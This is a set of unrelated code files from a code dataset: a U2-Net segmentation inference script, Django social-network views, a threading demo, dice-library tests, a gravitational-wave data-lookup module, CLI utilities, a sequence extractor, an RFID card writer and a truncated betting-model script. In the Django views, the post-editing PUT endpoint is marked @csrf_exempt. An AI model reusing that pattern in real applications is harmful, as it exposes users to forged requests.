h, w = image.shape[:2]\n# predict = pred\n# predict = predict.squeeze()\n# predict_np = predict.cpu().data.numpy()\n# predict_np = np.uint8(predict_np * 255)\n# predict_np = cv2.resize(predict_np, (w, h))\n# ret, thresh = 
cv2.threshold(predict_np, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# kernel = np.ones((3, 3), np.uint8)\n# opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=2)\n# im = cv2.dilate(opening, kernel, iterations=3) # sure_bg -> im\n# # dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n# # ret, sure_fg = cv2.threshold(dist_transform, 0.7 * dist_transform.max(), 255, 0)\n# # cv2.imwrite('./sure_fg.jpg', sure_fg)\n# # cv2.imwrite('./sure_bg.jpg', sure_bg)\n# # sure_fg = np.uint8(sure_fg)\n# # unknown = cv2.subtract(sure_bg, sure_fg)\n# # cv2.imwrite('./subtract.jpg', unknown)\n# # ret, markers = cv2.connectedComponents(sure_fg)\n# # markers += 1\n# # markers[unknown == 255] = 0\n# # markers = cv2.watershed(image, markers)\n# # image[markers == -1] = [0, 255, 0]\n# # cv2.imwrite('./res.jpg', image)\n\n# # _, im = cv2.threshold(predict_np * 255, 100, 255, cv2.THRESH_BINARY)\n# # im = cv2.resize(im, (w, h))\n# # im /= 255\n# # im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)\n# # image = np.uint8(image * im)\n\n# # im = np.uint8(im)\n# im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)\n# cv2.bitwise_and(image, im, image)\n# # cv2.imwrite('./res.jpg', image)\n\n# aaa = img_name.split(\".\")\n# bbb = aaa[0:-1]\n# imidx = bbb[0]\n# for i in range(1, len(bbb)):\n# imidx = imidx + \".\" + bbb[i]\n# # cv2.imwrite(d_dir + imidx + 'mask.jpg', predict_np*255)\n# cv2.imwrite(d_dir + imidx + '.jpg', image)\n######### modified ended ###########\n\ndef main():\n\n # --------- 1. get image path and name ---------\n model_name = 'u2netp' # u2netp u2net\n data_dir = '/data2/wangjiajie/datasets/scene_segment1023/u2data/'\n image_dir = os.path.join(data_dir, 'test_imgs')\n prediction_dir = os.path.join('./outputs/', model_name + '/')\n if not os.path.exists(prediction_dir):\n os.makedirs(prediction_dir, exist_ok=True)\n # tra_label_dir = 'test_lbls/'\n\n image_ext = '.jpg'\n # label_ext = '.jpg' # '.png'\n model_dir = os.path.join(os.getcwd(), 'saved_models', model_name, model_name + '.pth')\n\n img_name_list = glob.glob(image_dir + os.sep + '*')\n print(f'test img numbers are: {len(img_name_list)}')\n\n # --------- 2. dataloader ---------\n #1. dataloader\n test_salobj_dataset = SalObjDataset(img_name_list = img_name_list,\n lbl_name_list = [],\n transform=Compose([SmallestMaxSize(max_size=320),])\n )\n test_salobj_dataloader = DataLoader(test_salobj_dataset,\n batch_size=1,\n shuffle=False,\n num_workers=1)\n\n # --------- 3. model define ---------\n if (model_name == 'u2net'):\n print(\"...load U2NET---173.6 MB\")\n net = U2NET(3, 1)\n elif(model_name == 'u2netp'):\n print(\"...load U2NEP---4.7 MB\")\n net = U2NETP(3, 1)\n \n # net.load_state_dict(torch.load(model_dir))\n checkpoint = torch.load(model_dir)\n d = collections.OrderedDict()\n for key, value in checkpoint.items():\n tmp = key[7:]\n d[tmp] = value\n net.load_state_dict(d)\n if torch.cuda.is_available():\n net.cuda()\n net.eval()\n\n # --------- 4. 
inference for each image ---------\n for i_test, data_test in enumerate(test_salobj_dataloader):\n\n print(\"inferencing:\", img_name_list[i_test].split(os.sep)[-1])\n\n inputs_test = data_test['image']\n inputs_test = inputs_test.type(torch.FloatTensor)\n\n if torch.cuda.is_available():\n inputs_test = Variable(inputs_test.cuda())\n else:\n inputs_test = Variable(inputs_test)\n\n d1, d2, d3, d4, d5, d6, d7= net(inputs_test)\n\n # normalization\n pred = 1.0 - d1[:, 0, :, :]\n pred = normPRED(pred)\n\n # save results to test_results folder\n save_output(img_name_list[i_test], pred, prediction_dir)\n\n del d1, d2, d3, d4, d5, d6, d7\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trarynight/u2net","sub_path":"multi_u2net_test.py","file_name":"multi_u2net_test.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24389950001","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.core.paginator import Paginator\n\nfrom .models import User, Post\n\n\nfrom . import util \n\ndef index(request):\n return render(request, \"network/index.html\")\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n@login_required\ndef publish(request):\n \"\"\"\n Handles a POST request for a new post\n \"\"\"\n # Composing a new post must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n \n data = json.loads(request.body)\n user = request.user\n\n post = Post(author=user, body = data['body'])\n print(post)\n post.save()\n\n print(data)\n\n return JsonResponse({\"message\": \"Post created successfully.\"}, status=201)\n\ndef user_posts(request, username):\n page = request.GET.get('page', '1')\n try:\n posts = util.get_all_user_posts(username)\n except 
User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": int(page),\n \"num_pages\" : paginator.num_pages},\n safe=False)\ndef all_posts(request):\n page = request.GET.get('page', '1')\n posts = Post.objects.all().order_by('-timestamp_created')\n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": page,\n \"num_pages\" : paginator.num_pages},\n safe=False)\n\n@csrf_exempt\ndef post(request, post_id):\n \"\"\"\n Handles GET and PUT requests to get or edit the post with the id. When successful,\n both return the current post in JSON form.\n \"\"\"\n # Query for requested post\n try:\n post = Post.objects.get(pk=post_id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found.\"}, status=404)\n if request.method == 'GET':\n return JsonResponse(post.serialize())\n \n if request.method == 'PUT':\n if not request.user.is_authenticated:\n return JsonResponse({'error': 'User must be authenticated to like'})\n\n data = json.loads(request.body)\n print(data)\n\n if data.get(\"body\") is not None:\n # User wants to update body\n if request.user != post.author:\n return JsonResponse({\"error\": \"Must be the owner of the post to modify it!\"})\n post.body = data.get(\"body\")\n post.save()\n return JsonResponse(post.serialize(), safe=True)\n \n if data.get(\"like\") is not None:\n try:\n liked = post.users_who_liked.get(pk=request.user.id)\n # if the user has liked the post already, remove them\n post.users_who_liked.remove(liked)\n post.save()\n except User.DoesNotExist:\n # if user hasn't liked it, add them to the list of likers\n post.users_who_liked.add(request.user)\n post.save()\n return JsonResponse(post.serialize(), safe=True)\n\n@login_required\ndef following_posts(request):\n username = request.user.username\n if request.method != 'GET':\n return JsonResponse({'error': 'Request to following feed must be a GET'})\n try:\n posts = util.get_all_following_posts(username)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n page = request.GET.get('page', '1') \n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": page,\n \"num_pages\" : paginator.num_pages},\n safe=False) \n\n@login_required\ndef user(request, username):\n \"\"\"\n Handles GET and PUT requests to get or edit the user with the username. 
When successful,\n both return the current post in JSON form.\n \"\"\"\n # Query for requested post\n try:\n queried_user = User.objects.get(username=username)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n if request.method == 'GET':\n return JsonResponse(queried_user.serialize())\n \n if request.method == 'PUT':\n if not request.user.is_authenticated:\n return JsonResponse({'error': 'User must be authenticated to change user info'})\n data = json.loads(request.body)\n\n if data.get(\"follow\") is not None:\n if request.user.id == queried_user.id:\n return JsonResponse({'error': 'Cannot follow self!'})\n try:\n queried_user.followers.get(pk=request.user.id)\n # if the user has followed, remove them\n queried_user.followers.remove(request.user)\n queried_user.save()\n except User.DoesNotExist:\n # if user hasn't followed, follow\n queried_user.followers.add(request.user)\n queried_user.save()\n return JsonResponse(queried_user.serialize(), safe=True)","repo_name":"ajnipp/network","sub_path":"network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20778638443","text":"#!/usr/bin/env python3\n# _*_ coding:utf-8 _*_\n#\n# Author: Payne Zheng \n# Date: 2019/7/31\n# Location: DongGuang\n# Desc: do the right thing\n\n\"\"\"\n信号量也是一把锁,可以指定信号量为5,\n对比互斥锁同一时间只能有一个任务抢到锁去执行,信号量同一时间可以有5个任务拿到锁去执行\n\"\"\"\nimport time\nfrom threading import Thread, Semaphore, currentThread, activeCount\n\nsm = Semaphore(3) # 信号量锁对象(允许同时三个线程拿到锁)\n\ndef task():\n with sm: # sm.acquire; sm.release\n print(f'{currentThread().name} is work...')\n print(f'activeCount: {activeCount()}')\n time.sleep(3)\n print(f'{currentThread().name} is done...')\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n t = Thread(target=task)\n t.start()\n\n","repo_name":"PAYNE1Z/python-learn","sub_path":"luffycity-s8/第四模块_并发编程/13_信号量.py","file_name":"13_信号量.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6150206022","text":"from unittest import TestCase\nfrom unittest.mock import create_autospec\n\nfrom python_dice.interface.constraint.i_constraint_factory import IConstraintFactory\nfrom python_dice.interface.constraint.i_constraint_merger import IConstraintMerger\nfrom python_dice.interface.constraint.i_constraint_set import IConstraintSet\nfrom python_dice.src.constraint.constraint_set_factory import ConstraintSetFactory\n\n\nclass TestConstraintSetFactory(TestCase):\n def test_create_constraint_set(self):\n constraint_set_factory = ConstraintSetFactory()\n self.assertIsInstance(constraint_set_factory.create_constraint_set(), IConstraintSet)\n\n @staticmethod\n def test_uses_constraint_merger():\n mock_constraint_merger = create_autospec(IConstraintMerger)\n constraint_set_factory = ConstraintSetFactory(constraint_merger=mock_constraint_merger)\n constraint_set_factory.create_constraint_set()\n mock_constraint_merger.merge_new_constraints.assert_called_once()\n\n def test_uses_constraint_factory(self):\n mock_constraint_factory = create_autospec(IConstraintFactory)\n constraint_set_factory = ConstraintSetFactory(constraint_factory=mock_constraint_factory)\n new_set = constraint_set_factory.create_constraint_set()\n self.assertEqual({mock_constraint_factory.null_constraint}, 
set(new_set.constraints))\n","repo_name":"markbrockettrobson/python_dice","sub_path":"python_dice/test/constraint/test_constraint_set_factory.py","file_name":"test_constraint_set_factory.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"456301844","text":"import os.path\n\nfrom glue.lal import CacheEntry\n\nfrom .. import version\nfrom ..time import to_gps\nfrom ..utils import with_import\n\n__version__ = version.version\n__author__ = 'Duncan Macleod '\n\n\n@with_import('glue.datafind')\ndef connect(host=None, port=None):\n \"\"\"Open a new datafind connection\n\n Parameters\n ----------\n host : `str`\n name of datafind server to query\n port : `int`\n port of datafind server on host\n\n Returns\n -------\n connection : `~glue.datafind.GWDataFindHTTPConnection`\n the new open connection\n \"\"\"\n port = port and int(port)\n if port is not None and port != 80:\n cert, key = datafind.find_credential()\n return datafind.GWDataFindHTTPSConnection(\n host=host, port=port, cert_file=cert, key_file=key)\n else:\n return datafind.GWDataFindHTTPConnection(host=host, port=port)\n\n\ndef find_frametype(channel, gpstime=None, frametype_match=None,\n host=None, port=None, return_all=False, exclude_tape=False):\n \"\"\"Find the frametype(s) that hold data for a given channel\n \"\"\"\n from ..detector import Channel\n channel = Channel(channel)\n name = channel.name\n if gpstime is not None:\n gpstime = to_gps(gpstime).seconds\n connection = connect(host, port)\n types = connection.find_types(channel.ifo[0], match=frametype_match)\n # get reference frame for all types\n frames = []\n for ft in types:\n try:\n if gpstime is None:\n frame = connection.find_latest(\n channel.ifo[0], ft, urltype='file')[0]\n else:\n frame = connection.find_frame_urls(\n channel.ifo[0], ft, gpstime, gpstime, urltype='file',\n on_gaps='ignore')[0]\n except (IndexError, RuntimeError):\n continue\n else:\n if os.access(frame.path, os.R_OK) and (\n not exclude_tape or not on_tape(frame)):\n frames.append((ft, frame.path))\n # sort frames by allocated block size and regular size\n # (to put frames on tape at the bottom of the list)\n frames.sort(key=lambda x: (on_tape(x[1]), num_channels(x[1])))\n # search each frametype for the given channel\n found = []\n for ft, path in frames:\n if get_channel_type(name, path):\n if not return_all:\n return ft\n else:\n found.append(ft)\n if len(found) == 0 and gpstime:\n raise ValueError(\"Cannot locate %r in any known frametype at GPS=%d\"\n % (name, gpstime))\n elif len(found) == 0:\n raise ValueError(\"Cannot locate %r in any known frametype\" % name)\n else:\n return found\n\n\n@with_import('lalframe')\ndef num_channels(framefile):\n \"\"\"Find the total number of channels in this framefile\n \"\"\"\n frfile = lalframe.FrameUFrFileOpen(framefile, \"r\")\n frtoc = lalframe.FrameUFrTOCRead(frfile)\n return sum(\n getattr(lalframe, 'FrameUFrTOCQuery%sN' % type_.title())(frtoc) for\n type_ in ['adc', 'proc', 'sim'])\n\n\n@with_import('lalframe')\ndef get_channel_type(channel, framefile):\n \"\"\"Find the channel type in a given frame file\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n name of data channel to find\n framefile : `str`\n path of GWF file in which to search\n\n Returns\n -------\n ctype : `str`\n the type of the channel ('adc', 'sim', or 'proc') if the\n channel exists in the table-of-contents for the given frame,\n otherwise `False`\n \"\"\"\n 
name = str(channel)\n # read frame and table of contents\n frfile = lalframe.FrameUFrFileOpen(framefile, \"r\")\n frtoc = lalframe.FrameUFrTOCRead(frfile)\n for type_ in ['sim', 'proc', 'adc']:\n query = getattr(lalframe, 'FrameUFrTOCQuery%sName' % type_.title())\n i = 0\n while True:\n try:\n c = query(frtoc, i)\n except RuntimeError:\n break\n else:\n if c == name:\n return type_\n i += 1\n return False\n\n\ndef find_best_frametype(channel, start, end, urltype='file',\n host=None, port=None, allow_tape=True):\n \"\"\"Intelligently select the best frametype from which to read this channel\n \"\"\"\n start = to_gps(start).seconds\n end = to_gps(end).seconds\n frametype = find_frametype(channel, gpstime=start, host=host, port=port,\n exclude_tape=not allow_tape)\n connection = connect(host=host, port=port)\n try:\n cache = connection.find_frame_urls(channel[0], frametype,\n start, end, urltype=urltype,\n on_gaps='error')\n if not allow_tape and on_tape(*cache):\n raise RuntimeError()\n except RuntimeError:\n alltypes = find_frametype(channel, gpstime=start, host=host, port=port,\n return_all=True, exclude_tape=not allow_tape)\n cache = [(ft, connection.find_frame_urls(\n channel[0], ft, start, end, urltype=urltype,\n on_gaps='ignore')) for ft in alltypes]\n if not allow_tape:\n cache = [ftc for ftc in cache if not on_tape(*ftc[1])]\n cache.sort(key=lambda x:\n len(x[1]) and -abs(x[1].to_segmentlistdict().values()[0]) or 0)\n try:\n return cache[0][0]\n except IndexError:\n raise ValueError(\"Cannot find any valid frametypes for %r\"\n % channel)\n else:\n return frametype\n\n\ndef on_tape(*files):\n \"\"\"Determine whether any of the given files are on tape\n\n Parameters\n ----------\n *files : `str`, `~glue.lal.CacheEntry`\n one or more paths to GWF files\n\n Returns\n -------\n True/False : `bool`\n `True` if any of the files are determined to be on tape,\n otherwise `False`\n \"\"\"\n for f in files:\n if isinstance(f, CacheEntry):\n f = f.path\n if os.stat(f).st_blocks == 0:\n return True\n return False\n","repo_name":"garywu921207/gwpy","sub_path":"gwpy/io/datafind.py","file_name":"datafind.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"32262366807","text":"import sys\nimport os\nimport re\nfrom operator import itemgetter\n\n\ndef print_stdout(command):\n \"\"\"\n Print commands to stdout, which are then interpreted by shell.\n\n :param command: string, command to be interpreted by shell\n :return: None\n \"\"\"\n sys.stdout.write(\"%s\\n\" % command)\n sys.stdout.flush()\n\n\ndef print_stderr(message):\n \"\"\"\n Print message to stderr, which WILL NOT be interpreted by shell.\n This function is also utilized to print banners and tables.\n\n :param message: string, message to write to stderr\n :return: None\n \"\"\"\n sys.stderr.write(\"%s\\n\" % message)\n sys.stderr.flush()\n\n\ndef split_list(raw_list, num_group, algorithm=\"remainder\"):\n \"\"\"\n Split given list into different groups.\n\n Two algorithms are implemented: by the remainder of the index of each\n element divided by the number of group, or the range of index. 
For example,\n if we are to split the list of [0, 1, 2, 3] into two groups, by remainder\n we will get [[0, 2], [1, 3]] while by range we will get [[0, 1], [2, 3]].\n\n :param raw_list: list to split\n :param num_group: integer, number of groups\n :param algorithm: string, should be either \"remainder\" or \"range\"\n :return: a list containing the split list\n \"\"\"\n assert num_group in range(1, len(raw_list)+1)\n assert algorithm in (\"remainder\", \"range\")\n num_element = len(raw_list)\n if algorithm == \"remainder\":\n list_split = [[raw_list[i] for i in range(num_element)\n if i % num_group == k] for k in range(num_group)]\n else:\n # Get the numbers of items for each group\n num_item = [num_element // num_group for i in range(num_group)]\n for i in range(num_element % num_group):\n num_item[i] += 1\n # Divide the list according to num_item\n list_split = []\n for i in range(num_group):\n j0 = sum(num_item[:i])\n j1 = j0 + num_item[i]\n list_split.append([raw_list[j] for j in range(j0, j1)])\n return list_split\n\n\ndef get_terminal_size():\n \"\"\"\n Get the current size of the terminal in characters. We do not use\n os.get_terminal_size() as it is available only in Python 3.\n\n :return: (integer, integer), size of the terminal\n \"\"\"\n rows, columns = os.popen('stty size', 'r').read().split()\n return int(rows), int(columns)\n\n\ndef print_banner(banner, columns):\n \"\"\"\n Print a banner like --------------- FOO ------------------ to stderr.\n\n The number '2' in this piece of code counts for the two spaces wrapping the\n central text.\n\n :param banner: the central text in the banner\n :param columns: total width of the banner\n :return: None\n \"\"\"\n if len(banner) + 2 > columns:\n print_stderr(banner)\n else:\n num_marks_total = columns - len(banner) - 2\n num_marks_left = num_marks_total // 2 \n num_marks_right = num_marks_total - num_marks_left\n banner_with_marks = \"\"\n mark = \"-\"\n for i in range(num_marks_left):\n banner_with_marks += mark\n banner_with_marks += \" %s \" % banner\n for i in range(num_marks_right):\n banner_with_marks += mark\n print_stderr(banner_with_marks)\n\n\ndef print_table(table_head, table_body, number_items=True):\n \"\"\"\n Print a table to stderr.\n\n :param table_head: string, head of the table\n :param table_body: list of strings\n :param number_items: boolean, whether to number the items in table_body\n :return: None\n \"\"\"\n rows, columns = get_terminal_size()\n\n # Print table head\n print_stderr(\"\")\n print_banner(table_head, columns)\n\n # Print table body\n if len(table_body) == 0:\n print_stderr(\"None\\n\")\n else:\n # Get the maximum length of string with reserved spaces.\n # DO NOT CHANGE THE NUMBER of RESERVED SPACES.\n max_length = max([len(string) for string in table_body])\n if not number_items:\n max_length += 2\n else:\n max_length += 6\n\n # Determine the number of columns and rows of the table\n num_table_column = columns // max_length\n num_table_row = len(table_body) // num_table_column\n if len(table_body) % num_table_column > 0:\n num_table_row += 1\n\n # Break table_body into rows and print\n table_rows = split_list(table_body, num_table_row)\n if not number_items:\n for row in table_rows:\n for string in row:\n fmt = \"%-\" + str(max_length) + \"s\"\n sys.stderr.write(fmt % string)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n else:\n # Determine the dimension of the transposed table, for numbering\n # the items\n table_dim_trans = []\n for i in range(num_table_column):\n 
if i < len(table_rows[-1]):\n table_dim_trans.append(num_table_row)\n else:\n table_dim_trans.append(num_table_row - 1)\n\n # Print the table with numbered items\n for i, row in enumerate(table_rows):\n for j, string in enumerate(row):\n fmt = \"%4d) %-\" + str(max_length-6) + \"s\"\n item_number = sum(table_dim_trans[:j]) + i + 1\n sys.stderr.write(fmt % (item_number, string))\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n\n\ndef print_list(list_head, list_body, number_items=True):\n \"\"\"\n Prints a list to stderr.\n\n :param list_head: string, head of the list\n :param list_body: list of strings\n :param number_items: boolean, whether to number the items\n :return:\n \"\"\"\n sys.stderr.write(\"%s: \" % list_head)\n if len(list_body) == 0:\n sys.stderr.write(\"None\")\n else:\n if number_items:\n for i, item in enumerate(list_body):\n sys.stderr.write(\"%4d) %s\" % (i+1, item))\n else:\n for i, item in enumerate(list_body):\n sys.stderr.write(\" %s\" % item)\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n\n\ndef get_latest_version(versions):\n \"\"\"\n Get the latest version for given software.\n :param versions: list of string, different versions of the software, each\n version should be in the form of\n [a-zA-Z0-9]+[-/]+[0-9\\.]+.?\n :return: string, the latest version of this software\n \"\"\"\n # Extract and normalize version numbers from software names\n ver_str = [re.search(r\"[0-9\\.]+\", ver).group().split(\".\")\n for ver in versions]\n ver_num = [[int(i) for i in ver if i != \"\"] for ver in ver_str]\n num_digit = max([len(ver) for ver in ver_num])\n for ver in ver_num:\n while len(ver) < num_digit:\n ver.append(0)\n\n # Sort version numbers\n ver_num = sorted(ver_num, key=itemgetter(slice(0, num_digit, 1)))\n\n # Get the software name corresponding to the latest version\n latest_version = sorted(versions)[-1]\n for ver_check in versions:\n ver_str_check = re.search(r\"[0-9\\.]+\", ver_check).group().split(\".\")\n ver_num_check = [int(i) for i in ver_str_check if i != \"\"]\n while len(ver_num_check) < num_digit:\n ver_num_check.append(0)\n difference = [abs(ver_num_check[i] - ver_num[-1][i])\n for i in range(num_digit)]\n if sum(difference) == 0:\n latest_version = ver_check\n break\n return latest_version\n\n\ndef str2list(string, separator=\",\"):\n \"\"\"\n Split a string into a list according to specified separator and remove\n empty elements.\n\n :param string: string to split\n :param separator: separator, should not be a space\n :return: list containing the segments\n \"\"\"\n string_trimmed = string.replace(\"\\n\", \"\").replace(\" \", \"\")\n string_list = [s for s in string_trimmed.split(separator) if s != \"\"]\n return string_list\n\n\ndef str2env(string_list):\n \"\"\"\n Convert the strings in a list to the form of (command, env_name, pattern).\n See the \"environ\" attribute of \"Module\" class for more details.\n\n :param string_list: list of strings to be parsed\n :return: list of tuples in the form of (command, env_name, pattern).\n \"\"\"\n environ = [tuple(s.split()) for s in string_list]\n return environ\n","repo_name":"yhli1016/Pmod","sub_path":"pmod/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31126073276","text":"#!/usr/bin/env python\n\nimport sys\nimport argparse\nfrom Bio import SeqIO\n# changed calling the function to work better with symbolic links\nfrom 
seq_functions.seq_funcs import *\n\nparser = argparse.ArgumentParser(description='extract sequences from a list of IDs')\n\nparser.add_argument('-s', '--sequence_file', dest='seqfile',\n type=str,\n help=\"name of sequence file to source\")\nparser.add_argument('-o', '--output', dest='output', \n type=str, help=\"file name for extracted sequences (optional)\")\nparser.add_argument('-l', '--listfile', dest='listing', \n type=str, help=\"file listing seq IDs to extract (one per line)\")\nparser.add_argument('-q', '--fastq', dest='fastq', action='store_true', \n help=\"add -q or --fastq arg is file is fastq (default fasta)\")\n\nargs = parser.parse_args()\ninfile = args.seqfile\noutseq = args.output\nlistfile = args.listing\nfastqfmt = args.fastq\n\nif args.fastq:\n seqtype = 'fastq'\nelse:\n seqtype = 'fasta'\n\nseqlist = make_list(listfile)\n\nseq_set = set(seqlist)\n\nif args.output:\n\n extract_seqs(seq_set, infile, seqtype, outseq)\n\nelse:\n extract_seqs(seq_set, infile, seqtype)\n\nprint(\"all done\")\n\n\n","repo_name":"hughcross/seq_tools","sub_path":"seq_extractor.py","file_name":"seq_extractor.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"5620257039","text":"\"\"\"\nThis example shows connecting to the PN532 and writing & reading a mifare classic\ntype RFID tag\n\"\"\"\nimport time\nimport os\nimport unicodedata\n\nimport audio\nimport board\nimport busio\n\nfrom adafruit_pn532.spi import PN532_SPI\nimport digitalio\nfrom digitalio import DigitalInOut\nimport RPi.GPIO as GPIO\n\nfrom adafruit_pn532.adafruit_pn532 import MIFARE_CMD_AUTH_B\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nspi.try_lock()\nspi.configure(baudrate=12000000)\nspi.unlock()\n\nreader1_pin = DigitalInOut(board.D24)\npn532 = PN532_SPI(spi, reader1_pin, debug=False)\nic, ver, rev, support = pn532.firmware_version\npn532.SAM_configuration()\n\n\nic, ver, rev, support = pn532.firmware_version\nprint(\"Found PN532 with firmware version: {0}.{1}\".format(ver, rev))\n\n# Configure PN532 to communicate with MiFare cards\npn532.SAM_configuration()\n\nprint(\"Waiting for RFID/NFC card to write to!\")\n\nkey = b\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\"\n\nwhile True:\n # Check if a card is available to read\n uid = pn532.read_passive_target(timeout=0.5)\n print(\".\", end=\"\")\n # Try again if no card is available.\n if uid is not None:\n break\n\nprint(\"\")\n\nprint(\"Found card with UID:\", [hex(i) for i in uid])\n\n#mifare 1K layout (chip + card)\n# 1 kByte\n\n# 16 Sektoren zu je 4 Blöcken (16 Bytes/16 Ascii Characters pro Block)\n\n#writeable blocks (https://support.ccs.com.ph/portal/en/kb/articles/mifare-classic-1k-memory-structure)\n# 4, 5, 6\n# 8, 9, 0A,\n# 0C, 0D, 0E,...\n\n#allow only 16 ascii characters, so i only need one block (block 4)\n# 2 characters for prefix \"en\", 1 for suffix \"#\", so my word can have 13 characters!\n\nprint(\"Authenticating block 4 ...\")\nauthenticated = pn532.mifare_classic_authenticate_block(uid, 4, MIFARE_CMD_AUTH_B, key)\nif not authenticated:\n print(\"Authentication failed!\")\n\n\ndata = bytearray(16)\n\nlang = \"en\"\nmessage = \"MANFREd\" #can be 13 characters long\nendofmessage = \"#\"\nmessage = lang+message+endofmessage\n\ndata[0:len(message)] = message.encode()\n\nprint(data)\n\n# Set 16 bytes of block to 0xFEEDBEEF\n#data = bytearray(16)\n#data[0:16] = b\"\\xFE\\xED\\xBE\\xEF\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n# Write 16 byte to 
block 4.\npn532.mifare_classic_write_block(4, data)\n\n# Read block\nprint(\n \"Wrote to block 4, now trying to read that data:\",\n [hex(x) for x in pn532.mifare_classic_read_block(4)],\n)","repo_name":"jimsio/hoorch","sub_path":"rework_mifare_readwrite.py","file_name":"rework_mifare_readwrite.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"31950418298","text":"import pandas as pd\nfrom sklearn.linear_model import RidgeCV, Ridge, Lasso\nimport numpy as np\nfrom datetime import datetime\nfrom scipy.optimize import minimize\nfrom random import random\n\ndef get_team_ranks(teams, coefs):\n\n ranks = (-coefs).argsort()\n\n for i in range(len(team_list)):\n print (i+1, teams[ranks[i]], coefs[ranks[i]])\n\ndef model_pred(model, games):\n games = np.asarray(games)\n return model.predict(games)\n\ndef calculate_ridge(Xs, ys, alpha):#\n # print (\"rolling\", len(Xs), len(ys))\n # print (Xs)\n # print(ys)\n Xs = np.asarray(Xs)\n Ys = np.asarray(ys)\n # Ys = Ys.reshape((Ys.shape[0], 1))\n # print (Xs)\n # print (Ys)\n # print (Xs.shape, Ys.shape)\n clf = Ridge(alpha=alpha, fit_intercept=True).fit(Xs, Ys)\n return clf\n\n\ndef get_inverse_sup_and_tot(sup_goal, tot_goal, sup_grid, tot_grid, sup_value_grid, tot_value_grid):\n new_grid = np.abs(sup_grid - sup_goal) + np.abs(tot_grid - tot_goal) + np.abs(sup_value_grid - sup_goal) / 100 + np.abs(\n tot_value_grid - tot_goal) / 100 + random() / 10000000\n\n cell = np.where(new_grid == new_grid.min())\n print(new_grid.min())\n print(np.abs(sup_grid - sup_goal)[cell], np.abs(tot_grid - tot_goal)[cell], np.abs(sup_value_grid - sup_goal)[cell], np.abs(tot_value_grid - tot_goal)[cell])\n if sup_value_grid[cell] == 0.79 and tot_value_grid[cell] == 3.16:\n pass\n i = 0\n return sup_value_grid[cell], tot_value_grid[cell]\n\nclass BetMaker:\n def __init__(self):\n self.hc_bets = 0\n self.ou_bets = 0\n self.hc_th = 0.25\n self.ou_th = 0.25\n self.hc_pl = 0\n self.ou_pl = 0\n\nimport pickle\n\nfolder = 